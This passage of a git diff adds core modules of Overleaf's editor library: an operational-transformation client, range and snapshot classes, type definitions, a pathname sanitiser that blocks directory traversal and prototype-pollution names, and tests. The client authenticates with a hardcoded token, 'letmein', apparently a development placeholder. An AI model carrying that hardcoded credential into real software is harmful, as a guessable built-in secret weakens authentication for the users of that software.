b/libraries/overleaf-editor-core/lib/ot_client.js @@ -0,0 +1,239 @@ +'use strict' + +const _ = require('lodash') + +const ChangeNote = require('./change_note') +const ChangeRequest = require('./change_request') +const Chunk = require('./chunk') +const Operation = require('./operation') + +/** + * Operational Transformation client. + * + * See OT.md for explanation. + */ +class OtClient { + constructor(_projectId, _editor, _blobStore, _socket) { + const STATE_DISCONNECTED = 0 + const STATE_LOADING = 1 + const STATE_READY = 2 + const STATE_WAITING = 3 + + let _version = null + let _state = STATE_DISCONNECTED + const _buffer = [] + let _ackVersion = null + let _outstanding = [] + let _pending = [] + const _waiting = [] + + this.connect = function otClientConnect() { + switch (_state) { + case STATE_DISCONNECTED: + _state = STATE_LOADING + _socket.emit('authenticate', { + projectId: _projectId, + token: 'letmein', + }) + break + default: + throw new Error('connect in state ' + _state) + } + } + + /** + * The latest project version number for which the client can construct the + * project content. 
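+     * (It starts at the loaded chunk's end version and advances as acks and
+     * remote changes are processed.)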
+ * + * @return {number} non-negative + */ + this.getVersion = function () { + return _version + } + + _socket.on('load', function otClientOnLoad(data) { + switch (_state) { + case STATE_LOADING: { + const chunk = Chunk.fromRaw(data) + const snapshot = chunk.getSnapshot() + snapshot.applyAll(chunk.getChanges(), { strict: true }) + _version = chunk.getEndVersion() + // TODO: we can get remote changes here, so it's not correct to wait for + // the editor to load before transitioning to the READY state + _editor.load(snapshot).then(function () { + _state = STATE_READY + }) + break + } + default: + throw new Error('loaded in state ' + _state) + } + }) + + // + // Local Operations + // + + function sendOutstandingChange() { + const changeRequest = new ChangeRequest(_version, _outstanding) + _socket.emit('change', changeRequest.toRaw()) + _state = STATE_WAITING + } + + function sendLocalOperation(operation) { + _outstanding.push(operation) + sendOutstandingChange() + } + + function queueLocalOperation(operation) { + _pending.push(operation) + } + + this.handleLocalOperation = function otClientHandleLocalOperation( + operation + ) { + switch (_state) { + case STATE_READY: + sendLocalOperation(operation) + break + case STATE_WAITING: + queueLocalOperation(operation) + break + default: + throw new Error('local operation in state ' + _state) + } + } + + /** + * A promise that resolves when the project reaches the given version. + * + * @param {number} version non-negative + * @return {Promise} + */ + this.waitForVersion = function otClientWaitForVersion(version) { + if (!_waiting[version]) _waiting[version] = [] + return new Promise(function (resolve, reject) { + _waiting[version].push(resolve) + }) + } + + function resolveWaitingPromises() { + for (const version in _waiting) { + if (!Object.prototype.hasOwnProperty.call(_waiting, version)) continue + if (version > _version) continue + _waiting[version].forEach(function (resolve) { + resolve() + }) + delete _waiting[version] + } + } + + // + // Messages from Server + // + + function advanceIfReady() { + if (_ackVersion !== null && _version === _ackVersion) { + _version += 1 + _ackVersion = null + handleAckReady() + advanceIfReady() + return + } + const changeNotes = _.remove(_buffer, function (changeNote) { + return changeNote.getBaseVersion() === _version + }) + if (changeNotes.length === 1) { + handleRemoteChangeReady(changeNotes[0].getChange()) + _version += 1 + advanceIfReady() + return + } + if (changeNotes.length !== 0) { + throw new Error('multiple remote changes in client version ' + _version) + } + } + + function bufferRemoteChangeNote(changeNote) { + const version = changeNote.getBaseVersion() + if (_.find(_buffer, 'baseVersion', version)) { + throw new Error('multiple changes in version ' + version) + } + if (version === _ackVersion) { + throw new Error('received change that was acked in ' + _ackVersion) + } + _buffer.push(changeNote) + } + + function handleAckReady() { + // console.log('handleAckReady') + if (_outstanding.length === 0) { + throw new Error('ack complete without outstanding change') + } + if (_state !== STATE_WAITING) { + throw new Error('ack complete in state ' + _state) + } + _editor.handleChangeAcknowledged() + resolveWaitingPromises() + if (_pending.length > 0) { + _outstanding = _pending + _pending = [] + sendOutstandingChange() + } else { + _outstanding = [] + _state = STATE_READY + } + } + + function handleRemoteChangeReady(change) { + if (_pending.length > 0) { + if (_outstanding.length === 0) { + throw new 
Error('pending change without outstanding change') + } + } + + Operation.transformMultiple(_outstanding, change.getOperations()) + Operation.transformMultiple(_pending, change.getOperations()) + + _editor.applyRemoteChange(change) + } + + _socket.on('ack', function otClientOnAck(data) { + switch (_state) { + case STATE_WAITING: { + const changeNote = ChangeNote.fromRaw(data) + _ackVersion = changeNote.getBaseVersion() + advanceIfReady() + break + } + default: + throw new Error('ack in state ' + _state) + } + }) + + _socket.on('change', function otClientOnChange(data) { + switch (_state) { + case STATE_READY: + case STATE_WAITING: + bufferRemoteChangeNote(ChangeNote.fromRaw(data)) + advanceIfReady() + break + default: + throw new Error('remote change in state ' + _state) + } + }) + + // + // Connection State + // TODO: socket.io error handling + // + + _socket.on('disconnect', function () { + _state = STATE_DISCONNECTED + // eslint-disable-next-line no-console + console.log('disconnected') // TODO: how do we handle disconnect? + }) + } +} + +module.exports = OtClient diff --git a/libraries/overleaf-editor-core/lib/range.js b/libraries/overleaf-editor-core/lib/range.js new file mode 100644 index 0000000..bc47632 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/range.js @@ -0,0 +1,232 @@ +// @ts-check + +const OError = require('@overleaf/o-error') + +/** + * @import { RawRange } from './types' + */ + +class Range { + /** + * @param {number} pos + * @param {number} length + */ + constructor(pos, length) { + if (pos < 0 || length < 0) { + throw new OError('Invalid range', { pos, length }) + } + /** @readonly */ + this.pos = pos + /** @readonly */ + this.length = length + } + + /** + * @return {number} + */ + get start() { + return this.pos + } + + /** + * @return {number} + */ + get end() { + return this.pos + this.length + } + + /** + * Is this range equal to the given range? + * + * @param {Range} other + * @returns {boolean} + */ + equals(other) { + return this.pos === other.pos && this.length === other.length + } + + /** + * @param {Range} range + * @returns {boolean} + */ + startsAfter(range) { + return this.start >= range.end + } + + /** + * @param {number} pos + * @returns {boolean} + */ + startIsAfter(pos) { + return this.start > pos + } + + /** + * + * @returns {boolean} + */ + isEmpty() { + return this.length === 0 + } + + /** + * checks if the range contains a given range + * @param {Range} range + */ + contains(range) { + return this.start <= range.start && this.end >= range.end + } + + /** + * checks if the range contains a cursor (i.e. 
the cursor may lie anywhere in the range, including at either end)
+   * @param {number} cursor
+   */
+  containsCursor(cursor) {
+    return this.start <= cursor && this.end >= cursor
+  }
+
+  /**
+   * @param {Range} range
+   */
+  overlaps(range) {
+    return this.start < range.end && this.end > range.start
+  }
+
+  /**
+   * checks if the range touches a given range
+   * @param {Range} range
+   */
+  touches(range) {
+    return this.end === range.start || this.start === range.end
+  }
+
+  /**
+   * @param {Range} range
+   * @returns {Range}
+   */
+  subtract(range) {
+    if (this.contains(range)) {
+      return this.shrinkBy(range.length)
+    }
+
+    if (range.contains(this)) {
+      return new Range(this.pos, 0)
+    }
+
+    if (range.overlaps(this)) {
+      if (range.start < this.start) {
+        const intersectedLength = range.end - this.start
+        return new Range(range.pos, this.length - intersectedLength)
+      } else {
+        const intersectedLength = this.end - range.start
+        return new Range(this.pos, this.length - intersectedLength)
+      }
+    }
+
+    return new Range(this.pos, this.length)
+  }
+
+  /**
+   * @param {Range} range
+   * @returns {boolean}
+   */
+  canMerge(range) {
+    return this.overlaps(range) || this.touches(range)
+  }
+
+  /**
+   * @param {Range} range
+   */
+  merge(range) {
+    if (!this.canMerge(range)) {
+      throw new Error('Ranges cannot be merged')
+    }
+    const newPos = Math.min(this.pos, range.pos)
+    const newEnd = Math.max(this.end, range.end)
+
+    return new Range(newPos, newEnd - newPos)
+  }
+
+  /**
+   * Moves the range by a given number
+   * @param {number} length
+   */
+  moveBy(length) {
+    return new Range(this.pos + length, this.length)
+  }
+
+  /**
+   * Extends the range by a given number
+   * @param {number} extensionLength
+   */
+  extendBy(extensionLength) {
+    return new Range(this.pos, this.length + extensionLength)
+  }
+
+  /**
+   * Shrinks the range by a given number
+   * @param {number} shrinkLength
+   */
+  shrinkBy(shrinkLength) {
+    const newLength = this.length - shrinkLength
+
+    if (newLength < 0) {
+      throw new Error('Cannot shrink range by more than its length')
+    }
+
+    return new Range(this.pos, newLength)
+  }
+
+  /**
+   * Splits a range on the cursor and inserts a range with the length provided
+   * @param {number} cursor
+   * @param {number} length
+   * @returns {[Range, Range, Range]}
+   */
+  insertAt(cursor, length) {
+    if (!this.containsCursor(cursor)) {
+      throw new Error('The cursor must be contained in the range')
+    }
+    const rangeUpToCursor = new Range(this.pos, cursor - this.pos)
+    const insertedRange = new Range(cursor, length)
+    const rangeAfterCursor = new Range(
+      cursor + length,
+      this.length - rangeUpToCursor.length
+    )
+    return [rangeUpToCursor, insertedRange, rangeAfterCursor]
+  }
+
+  toRaw() {
+    return {
+      pos: this.pos,
+      length: this.length,
+    }
+  }
+
+  /**
+   * @param {RawRange} raw
+   * @return {Range}
+   */
+  static fromRaw(raw) {
+    return new Range(raw.pos, raw.length)
+  }
+
+  /**
+   * Splits a range into two ranges, at a given cursor
+   * @param {number} cursor
+   * @returns {[Range, Range]}
+   */
+  splitAt(cursor) {
+    if (!this.containsCursor(cursor)) {
+      throw new Error('The cursor must be contained in the range')
+    }
+    const rangeUpToCursor = new Range(this.pos, cursor - this.pos)
+    const rangeAfterCursor = new Range(
+      cursor,
+      this.length - rangeUpToCursor.length
+    )
+    return [rangeUpToCursor, rangeAfterCursor]
+  }
+}
+
+module.exports = Range
diff --git a/libraries/overleaf-editor-core/lib/safe_pathname.js b/libraries/overleaf-editor-core/lib/safe_pathname.js
new file mode 100644
index 0000000..91bbd5b
--- /dev/null
+++
b/libraries/overleaf-editor-core/lib/safe_pathname.js @@ -0,0 +1,142 @@ +// @ts-check +'use strict' + +const path = require('path-browserify') + +/** + * Regular expressions for Overleaf v2 taken from + * https://github.com/overleaf/internal/blob/f7b287b6a07354000a6b463ca3a5828104e4a811/services/web/app/src/Features/Project/SafePath.js + */ + +// +// Regex of characters that are invalid in filenames +// +// eslint-disable-next-line no-control-regex +const BAD_CHAR_RX = /[/*\u0000-\u001F\u007F\u0080-\u009F\uD800-\uDFFF]/g + +// +// Regex of filename patterns that are invalid ("." ".." and leading/trailing +// whitespace) +// +const BAD_FILE_RX = /(^\.$)|(^\.\.$)|(^\s+)|(\s+$)/g + +// +// Put a block on filenames which match javascript property names, as they +// can cause exceptions where the code puts filenames into a hash. This is a +// temporary workaround until the code in other places is made safe against +// property names. +// +// See https://github.com/overleaf/write_latex/wiki/Using-javascript-Objects-as-Maps +// +const BLOCKED_FILE_RX = + /^(prototype|constructor|toString|toLocaleString|valueOf|hasOwnProperty|isPrototypeOf|propertyIsEnumerable|__defineGetter__|__lookupGetter__|__defineSetter__|__lookupSetter__|__proto__)$/ + +// +// Maximum path length, in characters. This is fairly arbitrary. +// +const MAX_PATH = 1024 + +/** + * Replace invalid characters and filename patterns in a filename with + * underscores. + * @param {string} filename + */ +function cleanPart(filename) { + filename = filename.replace(BAD_CHAR_RX, '_') + filename = filename.replace(BAD_FILE_RX, function (match) { + return new Array(match.length + 1).join('_') + }) + return filename +} + +/** + * All pathnames in a Snapshot must be clean. We want pathnames that: + * + * 1. are unambiguous (e.g. no `.`s or redundant path separators) + * 2. do not allow directory traversal attacks (e.g. no `..`s or absolute paths) + * 3. do not contain leading/trailing space + * 4. 
do not contain the character '*' in filenames + * + * We normalise the pathname, split it by the separator and then clean each part + * as a filename + * + * @param {string} pathname + * @return {String} + */ +exports.clean = function (pathname) { + return exports.cleanDebug(pathname)[0] +} + +/** + * See clean + * @param {string} pathname + * @return {[string,string]} + */ +exports.cleanDebug = function (pathname) { + let prev = pathname + let reason = '' + + /** + * @param {string} label + */ + function recordReasonIfChanged(label) { + if (pathname === prev) return + if (reason) reason += ',' + reason += label + prev = pathname + } + pathname = path.normalize(pathname) + recordReasonIfChanged('normalize') + + pathname = pathname.replace(/\\/g, '/') + recordReasonIfChanged('workaround for IE') + + pathname = pathname.replace(/\/+/g, '/') + recordReasonIfChanged('no multiple slashes') + + pathname = pathname.replace(/^(\/.*)$/, '_$1') + recordReasonIfChanged('no leading /') + + pathname = pathname.replace(/^(.+)\/$/, '$1') + recordReasonIfChanged('no trailing /') + + pathname = pathname.replace(/^ *(.*)$/, '$1') + recordReasonIfChanged('no leading spaces') + + pathname = pathname.replace(/^(.*[^ ]) *$/, '$1') + recordReasonIfChanged('no trailing spaces') + + if (pathname.length === 0) pathname = '_' + recordReasonIfChanged('empty') + + pathname = pathname.split('/').map(cleanPart).join('/') + recordReasonIfChanged('cleanPart') + + pathname = pathname.replace(BLOCKED_FILE_RX, '@$1') + recordReasonIfChanged('BLOCKED_FILE_RX') + return [pathname, reason] +} + +/** + * A pathname is clean (see clean) and not too long. + * + * @param {string} pathname + * @return {Boolean} + */ +exports.isClean = function pathnameIsClean(pathname) { + return exports.isCleanDebug(pathname)[0] +} + +/** + * A pathname is clean (see clean) and not too long. + * + * @param {string} pathname + * @return {[boolean,string]} + */ +exports.isCleanDebug = function (pathname) { + if (pathname.length > MAX_PATH) return [false, 'MAX_PATH'] + if (pathname.length === 0) return [false, 'empty'] + const [cleanPathname, reason] = exports.cleanDebug(pathname) + if (cleanPathname !== pathname) return [false, reason] + return [true, ''] +} diff --git a/libraries/overleaf-editor-core/lib/snapshot.js b/libraries/overleaf-editor-core/lib/snapshot.js new file mode 100644 index 0000000..c33b48f --- /dev/null +++ b/libraries/overleaf-editor-core/lib/snapshot.js @@ -0,0 +1,284 @@ +// @ts-check +'use strict' + +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') + +const FileMap = require('./file_map') +const V2DocVersions = require('./v2_doc_versions') + +const FILE_LOAD_CONCURRENCY = 50 + +/** + * @import { BlobStore, RawSnapshot, ReadonlyBlobStore } from "./types" + * @import Change from "./change" + * @import TextOperation from "./operation/text_operation" + * @import File from "./file" + */ + +class EditMissingFileError extends OError {} + +/** + * A Snapshot represents the state of a {@link Project} at a + * particular version. 
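+ *
+ * A minimal usage sketch (File.fromString, as provided by ./file, is assumed):
+ * @example
+ * const snapshot = new Snapshot()
+ * snapshot.addFile('main.tex', File.fromString('hello'))
+ * const copy = Snapshot.fromRaw(snapshot.toRaw())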
+ */
+class Snapshot {
+  static PROJECT_VERSION_RX_STRING = '^[0-9]+\\.[0-9]+$'
+  static PROJECT_VERSION_RX = new RegExp(Snapshot.PROJECT_VERSION_RX_STRING)
+  static EditMissingFileError = EditMissingFileError
+
+  /**
+   * @param {RawSnapshot} raw
+   * @return {Snapshot}
+   */
+  static fromRaw(raw) {
+    assert.object(raw.files, 'bad raw.files')
+    return new Snapshot(
+      FileMap.fromRaw(raw.files),
+      raw.projectVersion,
+      V2DocVersions.fromRaw(raw.v2DocVersions)
+    )
+  }
+
+  toRaw() {
+    /** @type RawSnapshot */
+    const raw = {
+      files: this.fileMap.toRaw(),
+    }
+    if (this.projectVersion) raw.projectVersion = this.projectVersion
+    if (this.v2DocVersions) raw.v2DocVersions = this.v2DocVersions.toRaw()
+    return raw
+  }
+
+  /**
+   * @param {FileMap} [fileMap]
+   * @param {string} [projectVersion]
+   * @param {V2DocVersions} [v2DocVersions]
+   */
+  constructor(fileMap, projectVersion, v2DocVersions) {
+    assert.maybe.instance(fileMap, FileMap, 'bad fileMap')
+
+    this.fileMap = fileMap || new FileMap({})
+    this.projectVersion = projectVersion
+    this.v2DocVersions = v2DocVersions
+  }
+
+  /**
+   * @return {string | null | undefined}
+   */
+  getProjectVersion() {
+    return this.projectVersion
+  }
+
+  /**
+   * @param {string} projectVersion
+   */
+  setProjectVersion(projectVersion) {
+    assert.maybe.match(
+      projectVersion,
+      Snapshot.PROJECT_VERSION_RX,
+      'Snapshot: bad projectVersion'
+    )
+    this.projectVersion = projectVersion
+  }
+
+  /**
+   * @return {V2DocVersions | null | undefined}
+   */
+  getV2DocVersions() {
+    return this.v2DocVersions
+  }
+
+  /**
+   * @param {V2DocVersions} v2DocVersions
+   */
+  setV2DocVersions(v2DocVersions) {
+    assert.maybe.instance(
+      v2DocVersions,
+      V2DocVersions,
+      'Snapshot: bad v2DocVersions'
+    )
+    this.v2DocVersions = v2DocVersions
+  }
+
+  /**
+   * @param {V2DocVersions} v2DocVersions
+   */
+  updateV2DocVersions(v2DocVersions) {
+    // merge new v2DocVersions into this.v2DocVersions
+    v2DocVersions.applyTo(this)
+  }
+
+  /**
+   * The underlying file map.
+   * @return {FileMap}
+   */
+  getFileMap() {
+    return this.fileMap
+  }
+
+  /**
+   * The pathnames of all of the files.
+   *
+   * @return {Array.<string>} in no particular order
+   */
+  getFilePathnames() {
+    return this.fileMap.getPathnames()
+  }
+
+  /**
+   * Get a File by its pathname.
+   * @see FileMap#getFile
+   * @param {string} pathname
+   */
+  getFile(pathname) {
+    return this.fileMap.getFile(pathname)
+  }
+
+  /**
+   * Add the given file to the snapshot.
+   * @see FileMap#addFile
+   * @param {string} pathname
+   * @param {File} file
+   */
+  addFile(pathname, file) {
+    this.fileMap.addFile(pathname, file)
+  }
+
+  /**
+   * Move or remove a file.
+   * @see FileMap#moveFile
+   * @param {string} pathname
+   * @param {string} newPathname
+   */
+  moveFile(pathname, newPathname) {
+    this.fileMap.moveFile(pathname, newPathname)
+    if (this.v2DocVersions) this.v2DocVersions.moveFile(pathname, newPathname)
+  }
+
+  /**
+   * The number of files in the snapshot.
+   *
+   * @return {number}
+   */
+  countFiles() {
+    return this.fileMap.countFiles()
+  }
+
+  /**
+   * Edit the content of an editable file.
+   *
+   * Throws an error if no file with the given name exists.
+   *
+   * @param {string} pathname
+   * @param {TextOperation} textOperation
+   */
+  editFile(pathname, textOperation) {
+    const file = this.fileMap.getFile(pathname)
+    if (!file) {
+      throw new Snapshot.EditMissingFileError(
+        `can't find file for editing: ${pathname}`
+      )
+    }
+    file.edit(textOperation)
+  }
+
+  /**
+   * Apply all changes in sequence. Modifies the snapshot in place.
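+   * (This is, for example, how ot_client.js replays history on load:
+   * snapshot.applyAll(chunk.getChanges(), { strict: true }).)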
+   *
+   * Ignore recoverable errors (caused by historical bad data) unless opts.strict is true
+   *
+   * @param {Change[]} changes
+   * @param {object} [opts]
+   * @param {boolean} opts.strict - do not ignore recoverable errors
+   */
+  applyAll(changes, opts) {
+    for (const change of changes) {
+      change.applyTo(this, opts)
+    }
+  }
+
+  /**
+   * If the Files in this Snapshot reference blob hashes, add them to the given
+   * set.
+   *
+   * @param {Set.<String>} blobHashes
+   */
+  findBlobHashes(blobHashes) {
+    /**
+     * @param {File} file
+     */
+    function find(file) {
+      const hash = file.getHash()
+      const rangeHash = file.getRangesHash()
+      if (hash) blobHashes.add(hash)
+      if (rangeHash) blobHashes.add(rangeHash)
+    }
+    // TODO(das7pad): refine types to enforce no nulls in FileMapData
+    // @ts-ignore
+    this.fileMap.map(find)
+  }
+
+  /**
+   * Load all of the files in this snapshot.
+   *
+   * @param {string} kind see {File#load}
+   * @param {ReadonlyBlobStore} blobStore
+   * @return {Promise<Record<String, File>>} an object where keys are the pathnames and
+   * values are the files in the snapshot
+   */
+  async loadFiles(kind, blobStore) {
+    /**
+     * @param {File} file
+     */
+    function load(file) {
+      return file.load(kind, blobStore)
+    }
+    // TODO(das7pad): refine types to enforce no nulls in FileMapData
+    // @ts-ignore
+    return await this.fileMap.mapAsync(load, FILE_LOAD_CONCURRENCY)
+  }
+
+  /**
+   * Store each of the files in this snapshot and return the raw snapshot for
+   * long term storage.
+   *
+   * @param {BlobStore} blobStore
+   * @param {number} [concurrency]
+   * @return {Promise.<RawSnapshot>}
+   */
+  async store(blobStore, concurrency) {
+    assert.maybe.number(concurrency, 'bad concurrency')
+
+    const projectVersion = this.projectVersion
+    const rawV2DocVersions = this.v2DocVersions
+      ? this.v2DocVersions.toRaw()
+      : undefined
+
+    /**
+     * @param {File} file
+     */
+    function store(file) {
+      return file.store(blobStore)
+    }
+    // TODO(das7pad): refine types to enforce no nulls in FileMapData
+    // @ts-ignore
+    const rawFiles = await this.fileMap.mapAsync(store, concurrency)
+    return {
+      files: rawFiles,
+      projectVersion,
+      v2DocVersions: rawV2DocVersions,
+    }
+  }
+
+  /**
+   * Create a deep clone of this snapshot.
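+   *
+   * Sketch: the clone round-trips through the raw form, so it shares no
+   * mutable state with the original (`file` here is an assumed example File):
+   *
+   *     const copy = snapshot.clone()
+   *     copy.addFile('new.tex', file) // leaves `snapshot` unchanged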
+   *
+   * @return {Snapshot}
+   */
+  clone() {
+    return Snapshot.fromRaw(this.toRaw())
+  }
+}
+
+module.exports = Snapshot
diff --git a/libraries/overleaf-editor-core/lib/types.ts b/libraries/overleaf-editor-core/lib/types.ts
new file mode 100644
index 0000000..53bf062
--- /dev/null
+++ b/libraries/overleaf-editor-core/lib/types.ts
@@ -0,0 +1,175 @@
+import Blob from './blob'
+import TrackingProps from './file_data/tracking_props'
+import ClearTrackingProps from './file_data/clear_tracking_props'
+
+export type BlobStore = {
+  getBlob(hash: string): Promise<Blob>
+  getString(hash: string): Promise<string>
+  putString(content: string): Promise<Blob>
+  putObject(obj: object): Promise<Blob>
+  getObject<T = unknown>(hash: string): Promise<T>
+}
+
+export type ReadonlyBlobStore = Pick<BlobStore, 'getBlob' | 'getString' | 'getObject'>
+
+export type RangesBlob = {
+  comments: CommentRawData[]
+  trackedChanges: TrackedChangeRawData[]
+}
+
+export type RawRange = {
+  pos: number
+  length: number
+}
+
+export type CommentRawData = {
+  id: string
+  ranges: RawRange[]
+  resolved?: boolean
+}
+
+export type TrackedChangeRawData = {
+  range: RawRange
+  tracking: TrackingPropsRawData
+}
+
+export type TrackingPropsRawData = {
+  type: 'insert' | 'delete'
+  userId: string
+  ts: string
+}
+
+export type ClearTrackingPropsRawData = {
+  type: 'none'
+}
+
+export type TrackingDirective = TrackingProps | ClearTrackingProps
+
+export type StringFileRawData = {
+  content: string
+  comments?: CommentRawData[]
+  trackedChanges?: TrackedChangeRawData[]
+}
+
+export type RawOrigin = {
+  kind: string
+}
+
+export type RawChange = {
+  operations: RawOperation[]
+  timestamp: string
+  authors?: (number | null)[]
+  v2Authors: string[]
+  origin: RawOrigin
+  projectVersion: string
+  v2DocVersions: RawV2DocVersions
+}
+
+export type RawOperation =
+  | RawEditFileOperation
+  // TODO(das7pad): add types for all the other operations
+  | object
+
+export type RawSnapshot = {
+  files: RawFileMap
+  projectVersion?: string
+  v2DocVersions?: RawV2DocVersions | null
+}
+
+export type RawHistory = {
+  snapshot: RawSnapshot
+  changes: RawChange[]
+}
+
+export type RawChunk = {
+  history: RawHistory
+  startVersion: number
+}
+
+export type RawFileMap = Record<string, RawFile>
+
+export type RawFile = { metadata?: Object } & RawFileData
+
+export type RawFileData =
+  | RawBinaryFileData
+  | RawHashFileData
+  | RawHollowBinaryFileData
+  | RawHollowStringFileData
+  | RawLazyStringFileData
+  | StringFileRawData
+
+export type RawHashFileData = { hash: string; rangesHash?: string }
+export type RawBinaryFileData = { hash: string; byteLength: number }
+export type RawLazyStringFileData = {
+  hash: string
+  stringLength: number
+  rangesHash?: string
+  operations?: RawEditOperation[]
+}
+export type RawHollowBinaryFileData = { byteLength: number }
+export type RawHollowStringFileData = { stringLength: number }
+
+export type RawV2DocVersions = Record<string, { pathname: string; v: number }>
+
+export type RawInsertOp =
+  | {
+      i: string
+      commentIds?: string[]
+      tracking?: TrackingPropsRawData
+    }
+  | string
+
+export type RawRemoveOp = number
+export type RawRetainOp =
+  | {
+      r: number
+      commentIds?: string[]
+      tracking?: TrackingPropsRawData | ClearTrackingPropsRawData
+    }
+  | number
+
+export type RawScanOp = RawInsertOp | RawRemoveOp | RawRetainOp
+
+export type RawTextOperation = {
+  textOperation: RawScanOp[]
+  contentHash?: string
+}
+
+export type RawAddCommentOperation = {
+  commentId: string
+  ranges: RawRange[]
+  resolved?: boolean
+}
+
+export type RawDeleteCommentOperation = { deleteComment: string }
+
+export type RawSetCommentStateOperation = {
+  commentId: string
+  resolved: 
boolean +} + +export type RawEditNoOperation = { + noOp: true +} + +export type RawEditFileOperation = RawEditOperation & { pathname: string } + +export type RawEditOperation = + | RawTextOperation + | RawAddCommentOperation + | RawDeleteCommentOperation + | RawSetCommentStateOperation + | RawEditNoOperation + +export type LinkedFileData = { + importedAt: string + provider: string + [other: string]: any +} + +export type RawLabel = { + text: string + authorId: number | null + timestamp: string + version: number +} diff --git a/libraries/overleaf-editor-core/lib/util.js b/libraries/overleaf-editor-core/lib/util.js new file mode 100644 index 0000000..52b1ab8 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/util.js @@ -0,0 +1,14 @@ +/* + * Misc functions + */ + +'use strict' + +/** + * @param {string} str + * @returns {boolean} true if the given string contains non-BMP chars otherwise false + */ +exports.containsNonBmpChars = function utilContainsNonBmpChars(str) { + // check for first (high) surrogate in a non-BMP character + return /[\uD800-\uDBFF]/.test(str) +} diff --git a/libraries/overleaf-editor-core/lib/v2_doc_versions.js b/libraries/overleaf-editor-core/lib/v2_doc_versions.js new file mode 100644 index 0000000..2cfada5 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/v2_doc_versions.js @@ -0,0 +1,83 @@ +// @ts-check +'use strict' + +const _ = require('lodash') + +/** + * @import File from "./file" + * @import Snapshot from "./snapshot" + * @import { RawV2DocVersions } from "./types" + */ + +class V2DocVersions { + /** + * @param {RawV2DocVersions} data + */ + constructor(data) { + this.data = data || {} + } + + /** + * @param {RawV2DocVersions?} [raw] + * @return {V2DocVersions|undefined} + */ + static fromRaw(raw) { + if (!raw) return undefined + return new V2DocVersions(raw) + } + + /** + * @return {RawV2DocVersions|null} + */ + toRaw() { + if (!this.data) return null + const raw = _.clone(this.data) + return raw + } + + /** + * Clone this object. + * + * @return {V2DocVersions|undefined} a new object of the same type + */ + clone() { + return V2DocVersions.fromRaw(this.toRaw()) + } + + /** + * @param {Snapshot} snapshot + */ + applyTo(snapshot) { + // Only update the snapshot versions if we have new versions + if (!_.size(this.data)) return + + // Create v2DocVersions in snapshot if it does not exist + // otherwise update snapshot v2docversions + if (!snapshot.v2DocVersions) { + snapshot.v2DocVersions = this.clone() + } else { + _.assign(snapshot.v2DocVersions.data, this.data) + } + } + + /** + * Move or remove a doc. + * Must be called after FileMap#moveFile, which validates the paths. 
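+   *
+   * Sketch (assuming an entry { pathname: 'a.tex', v: 1 } under some doc id):
+   *
+   *     versions.moveFile('a.tex', 'b.tex') // renames the tracked doc
+   *     versions.moveFile('b.tex', '') // an empty newPathname removes it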
+ * @param {string} pathname + * @param {string} newPathname + */ + moveFile(pathname, newPathname) { + for (const [id, v] of Object.entries(this.data)) { + if (v.pathname !== pathname) continue + + if (newPathname === '') { + delete this.data[id] + } else { + v.pathname = newPathname + } + break + } + } +} + +module.exports = V2DocVersions diff --git a/libraries/overleaf-editor-core/package.json b/libraries/overleaf-editor-core/package.json new file mode 100644 index 0000000..f5d826a --- /dev/null +++ b/libraries/overleaf-editor-core/package.json @@ -0,0 +1,34 @@ +{ + "name": "overleaf-editor-core", + "version": "1.0.0", + "description": "Library shared between the editor server and clients.", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "author": "team@overleaf.com", + "license": "Proprietary", + "private": true, + "devDependencies": { + "@types/check-types": "^7.3.7", + "@types/path-browserify": "^1.0.2", + "chai": "^3.3.0", + "mocha": "^11.1.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + }, + "dependencies": { + "@overleaf/o-error": "*", + "check-types": "^5.1.0", + "lodash": "^4.17.19", + "p-map": "^4.0.0", + "path-browserify": "^1.0.1" + } +} diff --git a/libraries/overleaf-editor-core/test/add_comment_operation.test.js b/libraries/overleaf-editor-core/test/add_comment_operation.test.js new file mode 100644 index 0000000..72d43d6 --- /dev/null +++ b/libraries/overleaf-editor-core/test/add_comment_operation.test.js @@ -0,0 +1,127 @@ +// @ts-check +const { expect } = require('chai') +const { AddCommentOperation, DeleteCommentOperation } = require('..') +const Range = require('../lib/range') +const StringFileData = require('../lib/file_data/string_file_data') + +describe('AddCommentOperation', function () { + it('constructs an AddCommentOperation fromJSON', function () { + const op = AddCommentOperation.fromJSON({ + commentId: '123', + resolved: true, + ranges: [{ pos: 0, length: 1 }], + }) + expect(op).to.be.instanceOf(AddCommentOperation) + expect(op.commentId).to.equal('123') + expect(op.ranges[0]).to.be.instanceOf(Range) + expect(op.resolved).to.be.true + }) + + it('should convert to JSON', function () { + const op = new AddCommentOperation('123', [new Range(0, 1)]) + expect(op.toJSON()).to.eql({ + commentId: '123', + ranges: [ + { + pos: 0, + length: 1, + }, + ], + }) + }) + + it('should apply operation', function () { + const fileData = new StringFileData('abc') + const op = new AddCommentOperation('123', [new Range(0, 1)]) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ]) + }) + + describe('invert', function () { + it('should delete added comment', function () { + const initialFileData = new StringFileData('abc') + const fileData = StringFileData.fromRaw(initialFileData.toRaw()) + const op = new AddCommentOperation('123', [new Range(0, 1)]) + op.apply(fileData) + expect(fileData.getComments().toRaw()).to.eql([ + { + id: '123', + ranges: [{ pos: 0, length: 1 }], + }, + ]) + const invertedOp = op.invert(initialFileData) + 
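+      // the inverse of adding a new comment deletes that comment again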
